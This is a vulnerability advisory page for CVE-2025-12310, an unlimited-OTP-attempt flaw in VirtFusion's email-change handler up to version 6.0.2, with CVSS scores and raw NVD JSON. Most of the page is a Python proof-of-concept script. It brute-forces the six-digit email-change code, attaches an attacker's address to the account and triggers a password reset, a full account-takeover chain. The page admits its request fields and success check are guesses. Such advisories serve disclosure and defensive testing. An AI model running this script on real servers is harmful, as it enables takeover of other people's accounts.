Security Vulnerability Report
CVE-2025-12310 CVSS 5.3 MEDIUM

CVE-2025-12310

Published: 2025-10-27 20:15:52
Last Modified: 2026-04-15 00:35:42

Description

A security vulnerability has been detected in VirtFusion up to 6.0.2. This vulnerability affects unknown code of the file /account/_settings of the component Email Change Handler. The manipulation leads to improper restriction of excessive authentication attempts. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
5.3 (CVSS v3.1 base score; the raw record below also carries a CVSS v4.0 base score of 5.5 with exploit maturity "Proof of Concept" and a CVSS v2.0 score of 5.0)
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available from NVD (the record's status is "Deferred", i.e. it has not been enriched); the affected range below is taken from the advisory text.

VirtFusion <= 6.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only; do not run it against systems you are not explicitly permitted to test. Note that the advisory does not publish the request parameters of the Email Change Handler, so the form field names, the OTP length and the success check used below are assumptions that must be confirmed against a real instance before the script's output is trusted.
python
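import itertools
import string
import time

# Target configuration.
#
# The public advisory (NVD / VulDB) identifies only the file /account/_settings
# and the "Email Change Handler" component; it does not publish request field
# names, the OTP format or what a successful response looks like. Every form
# field name and response marker below is an assumption inherited from the
# original PoC and must be confirmed against a real VirtFusion (<= 6.0.2)
# instance.
target_url = "http://target-server/account/_settings"
target_email = "[email protected]"  # NOTE(review): not used by the PoC as written; kept for reference
new_email = "[email protected]"
password_reset_url = "http://target-server/password/reset"

# Substring expected in the body of an accepted verification (case-insensitive).
# This is a guess — TODO confirm against a real success response.
SUCCESS_MARKER = "success"

# Deliberately malformed code, used once to capture what a *failed*
# verification looks like so that failure-page text can be excluded from the
# success check.
_NEVER_VALID_OTP = "not-a-code"


def generate_otp_codes(length: int = 6):
    """Yield every numeric OTP of ``length`` digits in ascending order.

    With the default of 6 digits this is 10**6 candidates, "000000" first.
    The original PoC hard-coded the length; it is a parameter here so the same
    generator serves deployments that use 4- or 8-digit codes.
    """
    for digits in itertools.product(string.digits, repeat=length):
        yield "".join(digits)


def looks_successful(status_code: int, body: str, baseline_body: str = "") -> bool:
    """Return True when a verification response looks like an accepted OTP.

    The original check (``'success' in text or status_code == 200``) fired on
    the very first guess against any application that re-renders the form with
    HTTP 200 after a wrong code. A response now counts as success only when all
    three hold:

    * the status is not an error (< 400),
    * the body contains SUCCESS_MARKER (case-insensitive), and
    * the body differs from ``baseline_body``, the body observed for a code
      that cannot be valid — this filters failure pages that themselves
      contain the marker (e.g. "verification not successful"). An empty
      baseline disables that comparison.
    """
    if status_code >= 400:
        return False
    if SUCCESS_MARKER not in body.lower():
        return False
    return not baseline_body or body != baseline_body


def _post_verification(session, otp_code: str, timeout: float):
    """POST one OTP guess to the email-change verifier and return the response."""
    payload = {
        'action': 'verify_email_change',
        'otp_code': otp_code,
    }
    return session.post(target_url, data=payload, timeout=timeout)


def exploit_cve_2025_12310(session=None, *, timeout: float = 10.0,
                           delay: float = 0.0, max_attempts: int = 0) -> bool:
    """PoC for CVE-2025-12310 (CWE-307 / CWE-799): brute-force the email-change OTP.

    Flow: (1) request an email change to ``new_email``, which is assumed to
    issue a 6-digit OTP; (2) submit candidate codes until one is accepted —
    this is the reported flaw, the handler is said to impose no limit on
    failed attempts; (3) request a password reset for the newly attached
    address.

    Args:
        session: A ``requests.Session``. The account-settings path and the
            ``current_password`` field suggest the handler expects a logged-in
            user even though the advisory rates the flaw PR:N; pass a
            pre-authenticated session if a fresh one is rejected. A new
            session is created when omitted.
        timeout: Per-request timeout in seconds (the original PoC set none
            and could hang forever on a stalled connection).
        delay: Seconds to sleep between guesses; 0 means no pause.
        max_attempts: Stop after this many guesses; 0 means try all of them.

    Returns:
        True if a code was accepted and the password reset was requested,
        False if step 1 was rejected or every candidate failed.
    """
    # Imported here so the pure helpers above can be imported and tested on a
    # machine without ``requests`` installed.
    import requests

    if session is None:
        session = requests.Session()

    # Step 1: request the email change; this is what triggers the OTP.
    init_payload = {
        'action': 'change_email',
        'new_email': new_email,
        'current_password': 'any_password',
    }
    response = session.post(target_url, data=init_payload, timeout=timeout)
    if response.status_code >= 400:
        # Most likely an unauthenticated or otherwise rejected request; up to
        # 10**6 further POSTs would be pointless.
        print(f"[-] Email change request rejected with HTTP {response.status_code}")
        return False

    # Capture the failure page once so a real success can be told apart from it.
    baseline_body = _post_verification(session, _NEVER_VALID_OTP, timeout).text

    # Step 2: brute-force the OTP. No lockout or throttling is expected.
    for attempt, otp_code in enumerate(generate_otp_codes(), start=1):
        if max_attempts and attempt > max_attempts:
            break
        response = _post_verification(session, otp_code, timeout)
        if looks_successful(response.status_code, response.text, baseline_body):
            print(f"[!] Valid OTP found: {otp_code}")
            print(f"[!] Email changed to: {new_email}")
            # Step 3: the account now points at our address; reset the password.
            session.post(password_reset_url, data={'email': new_email}, timeout=timeout)
            print("[!] Password reset request sent to new email")
            return True
        if delay:
            time.sleep(delay)

    print("[-] No OTP accepted")
    return False


if __name__ == "__main__":
    print("CVE-2025-12310 PoC - VirtFusion Email Change Handler")
    print("Target: /account/_settings endpoint")
    print("Vulnerability: No rate limiting on OTP verification")
    exploit_cve_2025_12310()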

References (from the `references` array of the raw record below; all VulDB): https://vuldb.com/?ctiid.329982, https://vuldb.com/?id.329982, https://vuldb.com/?submit.676825

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12310", "sourceIdentifier": "[email protected]", "published": "2025-10-27T20:15:51.943", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in VirtFusion up to 6.0.2. This vulnerability affects unknown code of the file /account/_settings of the component Email Change Handler. The manipulation leads to improper restriction of excessive authentication attempts. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": 
"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}, {"lang": "en", "value": "CWE-799"}]}], "references": [{"url": "https://vuldb.com/?ctiid.329982", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.329982", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.676825", "source": "[email protected]"}]}}